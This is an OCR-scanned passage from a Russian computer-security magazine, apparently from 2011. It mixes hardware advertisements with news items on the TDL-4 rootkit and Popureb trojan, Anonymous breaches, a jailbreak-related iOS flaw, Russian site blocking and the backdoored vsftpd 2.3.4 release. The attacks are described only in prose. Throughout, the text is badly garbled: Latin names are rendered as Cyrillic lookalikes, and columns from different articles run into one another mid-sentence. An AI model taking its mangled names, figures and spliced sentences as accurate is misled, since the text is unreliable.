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Моноблочные компьютеры 


Моноблочный компьютер АЗИЗ ЕТ2400Х\/Т на базе процессора ще Соге“м 17 подарит 
незабываемые эмоции всем любителям компьютерных игр, благодаря подлинной операци- 
онной системе \\Лпдом/з® 7 Домашняя расширенная и поддержке технологии стереоскопи- 
ческого изображения М\МУШОТЛА ЗВ \$оп. Аудиосистема компьютера ЕТ2400Х\Т способна 
воспроизводить широкий диапазон частот, в частности глубокий и мощный бас. Ее звуча- 
ние придется по вкусу всем пользователям, независимо от воспроизводимого материала, 
будь то фильмы, игры или музыка. 


Благодаря множеству современных технологий, обеспечивающих превосходную произво- 
дительность, АЗУ$ ЕТ2400ХУТ изменит ваши представления о работе и развлечениях. 
Кроме того, оригинальная система управления энергопотреблением АЗИЗ Фирег Нубпа 
Епдоте делает данный компьютер весьма энергоэффективным. Гакже в модели ЕТ2400Х\/Т 
имеется уникальная для моноблочных компьютеров возможность увеличивать объем сис- 
темной памяти. Для доступа к слотам памяти достаточно лишь снять крышку соответствую- 
щего отсека. 


Горячая линия АЗОЪЗ: (495) 23-11-999, 8-800-100-2787 
Горячая линия НОТИК: (495) 23-11-488; 8-800-100-1488 Гарантия 1 год 
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Баянистая история с проиндексированными 
Яндексом ЪМЪ ками, ж/д билетами и информа- 
цией о покупках в секс-шопах сыграла журналу 
на руку. В течение примерно недели ко мне 
ежедневно обращались от 3 до 5 раз с просьбой 
о комментарии или интервью. Благодаря этому 
удалось хорошо попиарить журнал и на радио, 
и на телеке: радио Маяк, канал Россия 1, Вести 
ЕМ, Русская служба ВВС и разные другие СМИ 
— спасибо за интерес к защите персональных 
данных :}. 


Сама история довольно безынтересная и 

уже давно поднадоела, но забавно, что все 

это вызывает неподдельный интерес у масс- 
медиа и обычных людей. Воистину: чужие тв 
и покупки анальных затычек трогают людей 
гораздо сильнее, чем все громкие субегсгите- 
истории на миллионы долларов вместе взятые. 
Что людям до миллионов, когда эсемесочки 
опасносте?7 


НАЙДЕТСЯ ВСЕ 


НДеКс 


Есть и другое занятное наблюдение. 
Практически все мои собеседники, узнав, что 
хакеры тут ни при чем, посредством неслож- 
ных индукционных размышлений приходили 

к тезису о том, что это точно кто-то спланиро- 
вал: заранее заготовил пяток крутых историй и 
начал методично их сливать. Однако без внят- 
ной цели такая активность не имеет смысла — а 
какую-либо внятную цель тут придумать крайне 
сложно. 


Учитывая, что у истории нет и никакого про- 
должения в виде национальной программы 
«Удвоение безопасности личных данных к 
2015 году», лично я эту теорию заговора не 
разделяю. В конце концов, поисковики всю 
свою жизнь индексируют секретные данные, а 
Соод(е-Паск всегда был прекрасным развлече- 
нием. 
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Некоторые люди считают, что дополнительная безопасность не может 
быть излишней. Им мало имеющегося в наличии шифрования, установ- 
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ДВА ДИСПЛЕЯ, ОДИН НОУТ 


Если посмотреть фоторепортажи из офисов различныхтехнологических 
компаний, несложно заметить, что многие профи предпочитают работать 
не на одном большом мониторе, а на двух-трех небольших. Это дей- 
ствительно удобно и позволяет значительно оптимизировать рабочий 
процесс. Тем, кто часто трудится вне офиса и мечтает, чтобыу ноутбука 
было сразу два дисплея, решила порадовать компания С5сгееп. Ноутбук 
СЪсгееп 5расеВоок оснащается двумя 17-дюймовыми дисплеями, 
каждый из которых имеет разрешение 1920х1080 точек. Какрасположе- 
ны мониторы, хорошо видно на иллюстрации. Разумеется, такого рода 
устройство едва ли может быть компактным: его вес составляет 10 фунтов, 
то есть 4,54 кг! Нотутуж каждый сам выбирает, что для него наиболее 
важно. Новинка представлена в двух вариантах — один немного мощнее, 
второй попроще. Младшая модель оснащена процессором Ще! Соге 15- 
560М 2,66 ГГц, 4 ГБ памяти ООКБ и дискретной видюхой. Старшая модель, в 
свою очередь, может похвастаться процем [г(е! Соге 17-7400М [1,73 ГГЦ и 
большим количеством оперативной памяти [8 ГБ). Интересный гаджет сто- 


> ООД 


ленных антивирусов, 20-символьных паролей. Специально для таких 
личностей компания \/В!5рег бу${егте [Милли м/б(5регзуз.согп] разработала 
[и уже представила публике] альтернативную прошивку для устройств 

на платформе Апагога. Время релиза выбрано очень грамотно: сейчас 
чуть ли не каждую неделю выходит сообщение о какой-нибудь новой 
угрозе для мобильной платформы от боод(е. На данный момент детище 
компании — \\/№!5регСоге — доступно лишь в виде бета-версии, причем 
только для смартфонов Мехиз 5 [36] и Мехиз Опе, но уже сейчас можно 
понять, что разработка довольно интересна. Делотут вот в чем. Аль- 
тернативные прошивки с прокаченной безопасностью появились не 
сегодня и не вчера. Но используемые в них способы защиты данных не 
выдерживают никакой критики: к критическим типам ресурсов банально 
полностью ограничивался доступ. Многие приложения такого жестокого 
обращения не выдерживаюти попросту падают. \\/Би5регСоге, в свою 
очередь, действует нетактопорно. Вместо полной блокировки доступа 
«куда не надо», данная прошивка создает и подсовываетлюбопытным 
приложениям фиктивные данные. К примеру, если какая-то программа 
захочетузнать |МЕ! девайса, она получит фальшивый идентификатор, 
сгенерированный специально для нее. В ответна запрос в доступе к 
списку контактов приложение получит пустой список, а вместо настоящих 
СР5-координат — липовые. К тому же прошивка обеспечивает шиф- 
рование пользовательских данных и информации на 5)-карте, имеет 
межсетевой экран \/\/Р!5регМопКог, позволяющий контролировать доступ 
различных приложений к Сети в режиме реального времени, и систему 
резервного копирования Е[аНВаск, которая помещает данные в облако, 
предварительно их зашифровав. 


6 из 10 копий Адобе Кеадег являются устаревшими и, соответственно, 
уязвимыми — сообщает компания Ауа${. 


итнедешево: $2395 для младшей модели и $2795 — для старшей. Однако 


сейчас на них действует 50% скидки по предзаказу. 
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У!ЕХ!ЕК.НОМЕ 703 


Много лет назад мы все заморачивались покупкой комьютера по частям и самостоятельно 
собирали его, посмеиваясь над производителями готовых сборок (и непременно теми, 

кто их покупает). Мол, и железо они подбирают не оптимальное, и продают втридорога. 
Романтика КапаусгаН'а давно ушла, пришел простой расчет. Оказалось, что готовые сборки с 
установленной системой зачастую обходятся дешевле, чем собирать компьютер самому. Легче 
пойти в магазин и купить компьютер с классной конфигурацией захорошую цену. В случае 
СМИЕХЕЕВ.НОМЕ 903 с 64-битной М/п4о\м<® 7 на борту ты получаешь практически топовую 


машину, которая идеально подойдет для игр. 


Процессор. 
В качестве процессора используется мощный двухядерный процес- 
сор г{е[® СогетМ 15-650 с частотой 3,2 ГГц и кэш-памятью 4 Мб. СРИУ 
имеет встроенный контроллер памяти и поддерживает технологию 
Тигбо Воо$, автоматически разгоняющую его под нагрузкой [напри- 
мер, в последних играх}. Более того, такие процессоры поставляют- 
ся еще и со встроенным контроллером памяти. 


Видео 


За игровые возможности отвечают две видеокарты СбеГогсе СТХ 460, 
основанные на новейшей вычислительной архитектуре «Гегпи». 
Благодаря высокой производительности в режиме Огес{Х 11 тес- 
селяции процессор СТХ 460 обеспечивает идеально четкую гра- 
фику без ущерба для скорости, а поддержка технологий ММШЛА 30 
\М=юп"М, РЛузХ® и СУПАТМ позволяет визуализировать все самые 
потрясающие эффекты, на которые способны компьютерные игры. 
Просто выставляй настройки графики на максимум. 


ОЗУ 


Компьютер У/ЕХЕЕК.НОМЕ 903 укомплектован оперативной памятью 
4 Гб, работающей в двухканальном режиме. Благодаря этому работа 


с каждым из двух установленных модулей памяти осуществляется 
параллельно. Пускай технология и не дает теоретического увеличе- 
ния пропускной способности в два раза, но, тем не менее, вносит 
ощутимый результат. 


Блок питания 


Набор мощного железа не может обойтись без надежного пита- 
ния. В \/ЕХЬЕК.НОМЕ электропитание осуществляется с помощью 
надежного блока питания мощностью 750 Вт. Это даже больше, чем 
нужно, но зато обеспечивает хороший запас надежности. 


Софт 

На всех компьютерах \/ЕХЬЕК.НОМЕ 903 предустановлена операци- 
онная система \\Ип4о\5® 7 Домашняя расширенная. Использование 
именно 64-битной версии не случайно: благодаря этому удается 
задействовать все 4 Гб установленной в компьютере памяти. Помимо 
ОС, дополнительно установлен бесплатный антивирус М!сгожой® 
бесигйу Еззеп!а(5 и ОНсе 2010 Мацег [включает в себя ограничен- 
ный функционал \\/ога® и Ехсе[®, для активации полнофункциональ- 
ной версии необходимо приобрести ключ продукта]. 


Г 


У ® 


ПАОМ/' / 


Мы рекомендуем подлинную ОС\пЧом5® 7. | 


% ШехЕСГ. 


ЗАО «БТК» — официальный дистрибутор 
техники \/ЕХЕЕК в России 

Единая служба поддержки М/ежег: 

+7 (800) 200-9660 

мимими.ммежег.ги 


© Владельцем товарного знака М!сгозо_® и логотипа \\Ипдо\и® 7, зарегистрированных на территории США и/или других стран, и владельцем авторских прав 


на его дизайн является корпорация М'сго5о  ®. 


РЕКЛАМА 


КАСПЕРСКИЙ В КОЗЬМОДЕМЬЯНСКЕ 


Раз в год высокопоставленный агент КГБ Евгений Касперский 
устраивает экспедиции в населенные пункты, находящиесяу всех на 
слуху, но, тем не менее, вызывающие сомнение даже самим фактом 
своего существования. В прошлом году это был Урюпинск. В этом 

— Козьмодемьянск (знамениттем, что является прообразом Нью- 
Васюков — шахматной столицы будущего из Ильфопетровских «12-ти 
стульев»). На этот раз натеплоход, забравший целую толпу блоггеров, 
журналистов и сотрудников ЛК из Нижнего Новгорода и отправивший 
их в Козьмодемьянск, попали целыхтри сотрудника журнала «Хакер» 
— главред Никита Кислицин, редактор Ма[маге Саша Лозовский и 
наш главный краш-лаборант, лютый врагантивирусов и проактивных 
защит — Чееоп!$. Кактуда попал последний гражданин — лучшеи 

не спрашивай, потому что ответ будет неожиданным: его тоже при- 
гласили. Видимо, в надежде зомбировать и внушить ему почтение к 
защитному программному обеспечению. 

Само трехдневное мероприятие, состоящее изтрансфера Москва- 
Нижний Новгород на «Сапсане», заплыва из Новгорода в Козьмо- 
демьянск на гигантском теплоходе «Георгий Жуков» и последующим 
дичайшем угаре в самом историческом городе оказалось настолько 
масштабно, что мы мало что из него запомнили. Поэтому расскажем 
только о том, что осталось в памяти. 


® Мы там выступали. На одной из секций слово было представлено Ни- 
ките, который продемонстрировал, насколько легко можно отснифать 
в местном вайфае активные сессии ВКонтакте//уе]оугпаУЕасероок и 
как следует отжечь в чужом виртуальном пространстве. Присутствую- 
щие журналисты испытали некоторое удивление, а сидящий рядом 


» 


ОБЪЕКТИВЫ ДЛЯ... [РНОМЕ 


Чего только не придумаютлюди. Как из- 
вестно, в 'РВопе отАрр(е имеется встроен- 
ная фотокамера, при помощи которой даже 
можно делать неплохие снимки. В Сети есть 
даже забавный видеоролик 


из профессиональной | = 
фотостудии, где фото- _ 
граф использует для 
работы свой айфон, 
прикрепляя его к 
штативу липучкой, и 
по окончании съемки 
демонстрирует 
безупречные снимки 
людей, которые вполне 
могли бы подойти для 
глянцевых журналов. Не- 
которым фанатам очевидно 
сильно хочется, чтобы в бед- 
ный смартфон была встроена 
настоящая, полноценная 
зеркалка, да покруче. Таких 


личностей, очевидно, оказа- 


> 006 


лось немало, потому как нашлись энтузиа- 
сты, придумавшие решение данной «про- 
блемы». В онлайновом магазине РВ о{о]о|о 
появился интересный набор, позволяющий 


со мной Оееоп!$ во время никитиного выступления беспокоился и ак- 
тивно пытался выкрикивать что-то вроде «я торгую УРМ‘’ом! Покупайте 
мой таг Н!ае, и вас никто не сможет отснифать, кроме меня самого!». 
За попытку рекламы своего софта Владимира поймали местные качки- 
охранники, привязали его к якорной цепи и... Нет, погодите, Чееоп!з'а 
на самом деле никто не ловил. Имел место совсем другой инцидент: 
через день мы узнали, что какой-то хитрый блогер поссорился с дру- 
гим блогером на почве угона его аккаунта с использованием описан- 
ного Никитой нехитрого способа. 

® Рассказ про кибероружейные свойства З{ихпет, портящего — и, 
похоже, на момент выхода этой статьи, уже испортившего иранские 
урановые центрифуги, был очень интересным. Правда, мы все равно 
писали об этом интереснее :}. 

® Порадовал доклад господина из Мгсго$ой, Андрея Бешкова. Не 
контентом, конечно — асвоим неповторимым стилем. Дело втом, 

что ситуацию с безопасностью мобильных майкрософтовских осей 

он прокомментировал примернотак: «То, с чем сейчас сталкивается 
Арр(е, мы прошли много летназад». Такие дела, дорогой читатель. То, 
что у Майкрософт вирусов много, ау Эппл — мало, означаетлишьто, 
что Стив Джобс менее опытен в этом направлении, и великие тысячи 
вирусов очень скоро обвалятся на его многострадальную голову :]. 

® В Козьмодемьянск приезжал сам Министр связи вместе со свитой из 
десятка Черных Автомобилей С Синими Мигалками. Из круглого стола 
с Игорем Щеголевым мы вынесли главную мысль, которая обрадова- 
ла: лезть в интернет и выдумывать какие-то излишние регулировки 
министр не намерен, так как считает это нецелесообразным. И натом 
спасибо, тезис сейчас очень важный. 


М!сгозо предлагает вознаграждение в размере $250 000 за любую 
информацию о людях, причастных к ботнету Кизфоск. 


подключать объективы 5[К-камер Сапоп и 
М!Коп к камере 'РВопе’а. Набор включает 

в себя специальный футляр для телефона, 
УФ-фильтр и адаптор для объективов Сапоп 
или М!Коп. Обойдется данный комплект 
недешево: стоимость варианта для 1РПопе 
3/365 составляет $190, для 'РРопе 4 — $249. 
И тем не менее, спрос есть. Фантастика. 
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ЗАРЯЖАЕМСЯ ОТ СОЛНЦА — \МЕХЕЕВ.5 ИМ 


Уникальное зарядное устройство недавно выпустила в про- 
дажу компания \\ежег. Гаджет \МЕХЬЕК.5УМ представляет 
собой мобильную солнечную батарею, которая преобра- 
зовывает солнечные лучи в электроэнергию. Устройство 
пригодится всем тем, кто часто оказывается оторван от благ 
цивилизации, но не хочеттаскать при себе полный рюкзак 
батареек. Новинку можно использоваться с мобильным 
телефоном, электронными книгами, цифровыми камера- 
ми, МР3З/МР4-плеерами, смартфонами, фотоаппаратами. 
Помимо солнечных лучей, встроенную батарею можно 
зарядить и от персонального компьютера посредством 
05В-кабеля или от электросети 220 В. Устройство способно 
сохранять накопленный заряд до шести месяцев. Кроме 
того батарея компактна (90х40х8,5 мм, вес — всего 45 г] и об- 
ладает стильным, ярким дизайном. Рекомендованная цена 
составляет всего 890 рублей. 


» 


ВРоссии очень любят платить за антивирусы. Легальное защитное ПО 
в России установлено на компьютерах 47,83% пользователей, если 


верить исследованию немецкой компании 6 ака. Мы обогнали Великобританию 
(47,29%), Нидерланды (47,23%) и даже США (45,4%). 


РУТКИТЫ АТАКУЮТ 


Интересные новости приходят из стана компании М!сго$оК. Инже- 


нер М'сгозо Е Ма[\маге Рго{есНоп Сетег ([ММРС) Чун Фэн написал 
в своем блоге о новой модификации троянца Роригер, с которой 
многим пользователям будет справиться весьма сложно. Новый 
вариант трояна, по словам инженера, забирается так глубоко в 


› 008 


систему, что единственный способ удалить его — вернуть Мп о\м/5 к 
своей первоначальной заводской конфигурации. 

«Если ваша система заражена трояном Тго]ап:М/п32/Роригеь.Е, мы 
советуем вам исправить главную загрузочную запись, а затем восполь- 
зоваться компакт-диском для восстановления системы, с его помощью 
вернув ОС к состоянию, в котором она пребывала до заражения», — пи- 
шет Чун. Согласись, откатывать систему — не самое удобное решение 
проблемы, но, увы, других решений Мтсгозо предложить не может. 
Помимо этого неприятного троянца, «Лаборатория Касперского» 
также отмечает повышенную активность последней версии руткита 
ТОЕ-4 [предыдущая версия ТО|-3, также известен как Ашгеоп и 
просто ТО). Данная малварь только за первые три месяца 2011 
года заразила 4,52? миллиона компьютеров, а новая модификация 

к тому же активно борется с конкурентами. Зараженные ТО! -4 
компьютеры очищаются от 20 вредоносных программ-соперников, 
таких как (еи5, СБо{ и ОрИта. Для верности троян также заносит 
командные сервера конкурентов в черный список, дабы не давать 
им нормально работать. Как и упомянутый выше Роригеб, ТОЕ-4 по- 
ражает главную загрузочную запись жесткого диска. Кстати, теперь 
зараза способна инфицировать и 64-битные версии \Ип9дом.5. По 
словам сотрудников «Лаборатории Касперского», «владельцы ТО 
пытаются создать несокрушимую ботсеть, защищенную отатак, 
конкурентов и антивирусных компаний». Впрочем, российским 
юзерам, похоже, можно не беспокоиться. Почти треть взломанных 
компьютеров расположены в США, еще 50% — делят между собой 
европейские страны, а вот Россия ТО! -4 совсем не охвачена. Дело 
в том, что распространяется ТО через партнерские программы, 
чьи хозяева платят за заражение ТО! -4 деньги. Цены варьируют- 
ся в пределах 20-200 долларов за каждые 1000 установок, сумма 
зависит от географического положения компьютера жертвы. Так 
вот — за Россию, равно как и за страны СНГ, ставки минимальны (не 
нужен наш трафик никому, не нужен!). 
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ОДНО И НАВСЕГДА 


АНОНИМУСЫ ВОЮЮТ С ЦЕЛЫМИ ГОРОДАМИ 


аресты членов некоммерческой группы Гооа Мо{ Вогпб$. Последние 
раздавали еду бездомным в городских парках, но делали это, как 
выяснилось, без надлежащего разрешения. Анонимусы заявили: 
«Это объявление войны. Апопутоиц$ начинает масштабную кампа- 
нию против васи веб-активов вашего города. Каждый день мы будем 
осуществлять по ОПо5-атаке на новую цель». Верные своему слову 
хакеры начали с сайта Огапдо [опа биае, который технически 
даже не принадлежит городским властям. 

Также Анонимус в рамках операции АпИЗес взломали очередного 
подрядчика ФБР. Нужно сказать, что компания [КС Еедега[ работала не 
только с федералами, но ис Министерством обороны, НАСА и другими 
госструктурами, однако не смогла обезопасить собственные серверы, 
за что и поплатилась. 

Через твиттер хакеры сообщили, что системы компании взломаны, 

а базы данных и личные письма скопированы. Если верить сообще- 


нию на сайте Ра${еБт, взлом был произведен путем использования 
обычной 5Ч | -иньекции. В КС Еедега[ факт взлома подтверждают, 


Хактивистам из числа Анонимусов достаточно лишь найти повод, и однако отказываются отлюбых дальнейших комментариев. ФБР тоже 
вот — новая операция стартовала, очередное сражение развязано. хранит молчание. А тем временем на ТВе Рига{е Вау уже появился 

На этот раз мишенью Анонов стал... американский город Орлан- торрент размером 107 МБ, который включает все полученныевре- 
до, штат Флорида. Поводом для «Операции Орландо» послужили зультате взлома данные. 


11 млн сайтов из зоны .с0.сс выкинул из своего индекса боо(е из-за того, 
Что в этой зоне очень высоки показатели спамерской активности и фрода. 


КОРЕЙСКИЙ КИБЕРСПЕЦНАЗ 


Все серьезнее относятся к киберугрозам правительства разных стран угроз со стороны Северной Кореи». Ожидается, что программа стартует 
мира. Совсем недавно власти Южной Кореи обвинили соседствующий — в 2012 году, когда в Университете Кореи заработает «школа киберобо- 
Пхеньян в том, что тот поддерживает и развивает «элитные хакерские роны», где студенты будут проходить полноценный четырехлетний курс 
подразделения». После таких заявлений, пресс-релиз распростра- обучения. Программа подготовки будет состоять из детального иссле- 
ненный недавно Министерством обороны страны выглядит вполне дования современных ИТ-решений, овладения навыками программи- 
логичным. Заявление гласит, что власти Южной Кореи в ближайшем рования, обучения методам борьбы с различной малварью и из многих 
будущем намереваются создать школы для подготовки специалистов других дисциплин, вплоть до психологической и физической подготов- 
в области киберзащиты и кибернападения. Конечно же, речь идет ки. По завершении обучения студенты станут действующими офицера- 
не о курсах для всех желающих, а о «воспитании солдат, способных ми армии и должны будут отслужить не менее семи лет. Похоже, иметь 
бороться в кибервойне на фоне растущих кибертеррористических собственный киберспецназ скоро станет признаком хорошего тона. 
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РЕКЛАМА 


ОТБОРНЫЕ ПРОДУКТЫ 
СО ВСЕГО МИРА* 


| ТАН Мы знаем, гда в мире найти самые лучшие продукты. 


БЛ И 3 И Т СЯ уу О 7 М А № Корпорация Мтсгозо начала распространять обновление Мапдо для 
своей операционной системы \\пдом/з РВопе 7. Пока это лишь ранняя 
версия для разработчиков — но релиз ожидается уже скоро. Измене- 
ний грядет немало: в Мапдо улучшат систему многозадачности, память 
будет распределяться более эффективно, а поддержка сторонних при- 
ложений также будет оптимизирована. Кроме того, Мапдо будет поддер- 
живать движок |Е 9 сего возможностями по обработке НТМЕ 5 иаппа- 
ратному ускорению веб-контента. Кстати, все возможности обновления 
будет поддерживать клиент 5$Куре для \\Лпдом/з РВопе 7. Представители 
М!сго5оК уверяют, что с выходом обновления большая часть интернет- 
приложений (скажем, клиентские решения для ТуиЦеги ЕасеБоокК), 
будет занимать где-то на четверть меньше памяти в ОЗУ смартфонов. 
Тем временем в Лос-Анджелесе на конференции \\ог[9млае Шеуворег 
Соп{егепсе 2011 уже продемонстрировали первые аппараты под управ- 
лением \\/!пдом/5 РВопе 7.1 Мапдо. Публике показали устройства отАсег, 
Кизи, (ТЕ и Загтзипод. Пока ни их детальные характеристики, ни даты 
поступления в продажу неизвестны, однако представители Мтсгозой 
прогнозируют, что стоить смартфоны будут всего $100-150. Софтверный 
гигант объясняет это тем, что комплектующие становятся все более 
доступными, и цены стремительно снижаются. Хотелось бы верить, что 
когда новинки доберутся до нашей страны, они будут стоить именно 


столько, ане как бывает обычно. 


Компания МсА!ее будет обеспечивать ежедневное бесплатное 
сканирование для каждого веб-сайта с адресом „ххх. 
За это она получит 8 млн долларов. 


ТЕМНАЯ СТОРОНА ДЖЕЙЛБРЕЙКА 


Компания Аррее не устает напоминать своим 
клиентам, что джейлбрейк может быть вреден, и 
никакой ответственности за случившееся стаким 
аппаратом Арр(е не несет. На этот раз о вреде 
джейлбрейка, разнообразия ради напоминают 
нам не сами «Яб6бл», а Германское правитель- 
ственное агентство по безопасности. Немцы 
сообщают, что обнаружили в последней версии 
джейлбрейка от команды О/еу-Теат [а6геаКкгле. 
сога, они самые] существенный недостаток. Дело 
в том, что в 10$ присутствует некая критическая 
уязвимость. После джейлбрейка появляется воз- 
можность обойти систему защиты отатак Арр(е 
АСЕ В [Адагез$ 5расе ауоц РапдогихаНоп] и 
получить удаленный доступ к смартфону. Пона- 
добится для этого трюка всего лишь модифици- 
рованный определенным образом файл РОЕ. В 
АррЕе эту информацию подтвердили, но исправ- 
лять проблему не спешат: по словам пресс- 
секретаря компании, уязвимость будетустранена 
только в следующей версии 105. Оеу-Теат также 
сообщили, что о дырке им известно, и даже вы- 
пустили инструмент РОЕ Ра{свег2, закрывающий 
проблему во взломанных устройствах. Впрочем, 
хакеры подчеркнули, что атак с использованием 
новой уязвимости пока не было, и осуществить 
их в целом довольно трудно. Однако втвиттере 
уже немало людей посоветовало пропатчить свои 
девайсы перед посещением грядущих крупных 


хакерских конференций. 
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ШЕСТЬ ПРЕДУПРЕЖДЕНИЙ СЕТЕВЫМ ПИРАТАМ 


> = 
и 


Документ, который в 
конце июля под- 
писали крупнейшие 
американские 
провайдеры, атакже 
музыкальные и кино- 
компании, навер- 
няка ввергв пучины 
депрессии многих 
западных любителей 
файлообмена. Оказы- 


вается, переговоры 
об этом соглашении 
и его деталях велись много лет. Провайдеры АТ&Т, \егитоп, Согпса$1, 
Са е\мз1оп и Тите \МагпегСа Ще долго не решались подписать бумагу 
о так называемых «Шести ударах», но антипиратское лобби сильно... 


Итак, воткчему пришли стороны. Кино-музыкальная индустрия отныне 
согласилась выявлять пиратов в файлообменных сетях [и нетолько в 
них], после чего их |Р-адреса будут передаваться непосредственно про- 
вайдерам. Провы, в свою очередь, по [Р’шнику будут устанавливать лич- 
ность «преступника» и высылать уличенному в пиратстве пользователю 
предупреждения. Чем большетаких «штрафных карточек» набирает 
юзер, тем хуже для него. Максимальное количество — шесть предупре- 
ждений, хотя уже после четырех провайдер имеет право ограничить 
пользователю скорость подключения к интернету или принудительно 
перенаправить его на веб-старницу с подробной информацией о нару- 
шении. Что особенно интересно, провайдеры могут выбирать меры пре- 
сечения на свое усмотрение. Такое чувство, что для выхода в интернет 
на Западе скоро нужно будет показывать в веб-камеру удостоверение 
личности, алюбой клик по ссылке того и гляди оберется арестом. Волей 
не волей начинаешь понимать многочисленных хактивистов с их борь- 
бой за сетевые свободы. 


0$В-кабелю отлюбого цифрового девай- 
са. Предполагается, что колонки ты будешь 
носить с собой, наряду с ноутбуком, поэтому 
их размеры весьма скромны: 261ммх36мм 
х44мм (ШХВХГ), вес: -0,ЗЗкг. Тем не менее, 
МР?250 могут похвастаться полноразмерными 
магнитно-экранированными динамиками. 
НЧ-динамик: овальный размером Зх1,25 
дюйма, 5 Ом, СЧ-и ВЧ-динамики: 4х 1,25 
дюйма. Выходная мощность колонок: ВМФ 2 
х 2\М/. Соотношение сигнал-шум: >75 дБ (А). 


Интересную новинку рада представить тебе, 
дорогой читатель, компания Е Шег. Модель 
МР?250 ориентирована на ноутбуки, так как 
все больше людей предпочитают десктопам 
портативные решения. Итак, если ты часто 
работаешь за лаптопом илюбишьхороший 


ПЕТР ДАРИТ ПРИЗЫ ВЫИГРАЙ КВАРТИРУ В ТВОЕМ ГОРОДЕ! 


В августе 2011 года марка «ПЕТР |› вновь проводит полюбившуюся многим программу «Выиграй квартиру 
в твоем городе!». За 5 лет обладателями сертификатов на покупку квартиры стали уже 55 счастливчиков, а 
десятки тысяч человек получили другие ценные призы. Акция продлится четыре месяца. Хочешь попол- 
нить ряды победителей? Тогда ищи коды под крышками промо-пачек «ПЕТР > с изображением главного 
приза и регистрируй их на сайте лили. ре{г-1.ги или по 5М$ на номер 5206. Среди призов сертификаты на 
покупку квартир, ЖК-телевизоров, МР4-и О\0-плееров. Также каждый часты можешь выиграть бонус на 
счет мобильного телефона, эквивалентный сумме 100 рублей. Самые активные участники могут получить 


звук, МР250 как раз то, что нужно. Новинка об- 
ладает алюминиевым корпусом, что не только 
выглядит стильно, но и предохраняет колонки 
отповреждений при транспортировке. МР?250 
не требуется внешний источник питания — и 
питание и звуковой сигнал поставляются по 


гарантированные призы - футболку или ветровку. 


Искажение: -1 %. Также хотелось бы заметить, 
что МР250 уже удостоились таких престижных 
наград, как КеЧ949о{ дез!дп а\м/ага млппег 2011, 
|- Ргодис{ дез!дп а\м/ага 2011 и [ппоуаНоп$ 
|п{егпаНопа( СЕ$. 


оатзипо ба(аху 5 | бьет рекорды продаж. За 55 дней было продано 
3 млн аппаратов. Первому ба[аху 5 этой отметки удалось достичь 
лишь через 85 дней. 


Общий срок проведения Акции — с 15 августа 2011 г. по 15 февраля 2012 г. 


Акции, сроках, месте, порядке 


их получения и стоимости отправки 5М5 — на сайте млм. ре{г-1.ги 


ведения, количестве призов или выигрышеи по результатам 


Регистрация кодов — с 15 августа 2011 по 2 декабря 2011 г. включительно на сайте млмм. 
ре{г-1.ги или по 1$ на номер 5206. Информация об Организаторе Акции, правилах ее про- 


В акции могут принимать участие только гражданеРФ, потребители сигарет старше 18 лет. 


 МЕСАМЕМ/5_ 


САЙТЫ ЗАКРЫВАЮТ БЕЗ ПОСТАНОВЛЕНИЯ СУДА 


Выяснилось, что новый закон «О полиции» развязал руки нашим 
правоохранительным органам, итеперь они могут блокировать доступ к 
«нежелательным» ресурсам, не дожидаясь соответствующего постанов- 
ления суда. Ст. 13 закона «О полиции» гласит, что полиция имеет право 
«вносить руководителям и должностным лицам организаций обязатель- 
ные для исполнения представления об устранении причин и условий, 
способствующих реализации угроз безопасности граждан и обществен- 
ной безопасности, совершению преступлений и административных 
правонарушений». Ранее закон обязывал провайдеров лишь рассмо- 
треть представление, но не выполнять его в обязательном порядке. Уже 
есть и первые прецеденты. В мае компания «Централ партнершип» об- 
ратилась с заявлением в полицию, так как в Сети нелегально предлагали 
скачать фильм «Свадьба по обмену», права на который принадлежат ЦП. 
Загвоздка заключалась втом, что лентутиражировали сайты, зареги- 
стрированные отнюдь нев России, а в Чехии, Голландии и Великобрита- 
нии. В итоге, управление «К» МВД России решило блокировать пиратов 
на уровне магистральных провайдеров и распространило предписание, 
согласно которому доступ к семи сайтам, предлагавшим фильм, должен 
был быть перекрыт в срок с начала мая по начало июня. Провайдеры 
|РТР Ме\могК$, КЕТМ и «Рускомнет» с требованием полиции согласились 
и доступ к сайтам для своих пользователей блокировали. В то же время 
«Комкор», «Гранстелеком», «Вымпелком», «МТС», «Ростелеком» и «Рас- 
ком» стребованием полиции не согласились, итеперь на них собираются 
жаловаться в Роскомнадзор. Ситуация, в общем-то, совсем не веселая. 


№ 


Аонеще даже не появился в продаже. 


( 


Представь, что какому-то злопыхателю сильно не нравитсятвой ресурс, 


он находит какой-нибудь пустяк, к которому можно прицепиться и пишет 
жалобу в «органы». Полиция это заявление рассматривает, и велик шанс, 
что сайт в самом деле заблочат науровне магистрального провайдера. 
Весело? Воти нам что-то не очень. 


9,14 Пц— дотакой частоты энтузиастам удалось разогнать новый 
флагманский процессор АМО ЕХ-8130Р 3,8 ГПц на архитектуре ВиЦ9оте. 


оАГЕТУ АМО ЗЕСУВИТУ СЕМТЕВ ХАКНУЛИ 


На сайте М'!сгозо{ есть служба с говорящим названием ЗаТе{у апа 
ЗесигЦу Сепег, которую, как это ни смешно, взломали. Хакерам уда- 
лось «отравить» поисковик Центра безопасности, поместив в него 
ссылки, ведущие на сомнительные порносайты, буквально кикшащие 
троянами. Жаль, что хак вышел не слишком масштабный — увидеть 
вредоносные ссылки можно было лишь после ввода в поисковик 


УЪЕТРО ЗАРАЗИЛИ 
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запросов «рогп» или «5{геатта». Вряд ли нашлось много людей, 
искавших в Центре безопасности подобные вещи. М!сгозо | была 
вынуждена на некоторое время приостановить работу поискового 
сервиса, но вскоре его работа возобновилась в штатном режиме. Ка- 
ким образом неизвестные взломщики сумели провернуть этоттркк, к 
сожалению, не сообщается. 


Создатель популярного сверхзащищенного ЕТР-серверау$Нра и из- 
вестный эксперт в области информационной безопасности Крис Эванс 
сообщил, что некие злоумышленники внедрили бэкдор в исходники его 
детища. Измененный архив \узИра-2.3.4{аг.2 распространялся через пер- 
вичный сервер проекта. При ближайшем рассмотрении атака оказалась 
весьма странной. Вредоносный код запускал Вена ТСР-порту 6200, если 
вЕТР-логине пользователя присутствовал смайл, что явно не характе- 
ризирует изменения сточки зрения желания выполнить массовую атаку. 
Более того, в код не было встроено никаких механизмов для сообщения 
обустановке протрояненного пакета. Непонятно, каким образом хакеры 
пытались выявить пораженные бэкдором хосты и пытались ли вообще. 
Сам Эванс склоняется ктому, что это скорее была обычная хулиганская вы- 
ходка, нежели целенаправленная атака. Какзлоумышленники взломали 
аккаунт на хостинге проекта, неизвестно, но сразу после атаки Эванс 
переместил сайт проекта со старого хостинга в инфраструктуру боод(е Арр 
Епдпе. Версия строяном внутри была доступна для скачивания околотрех 
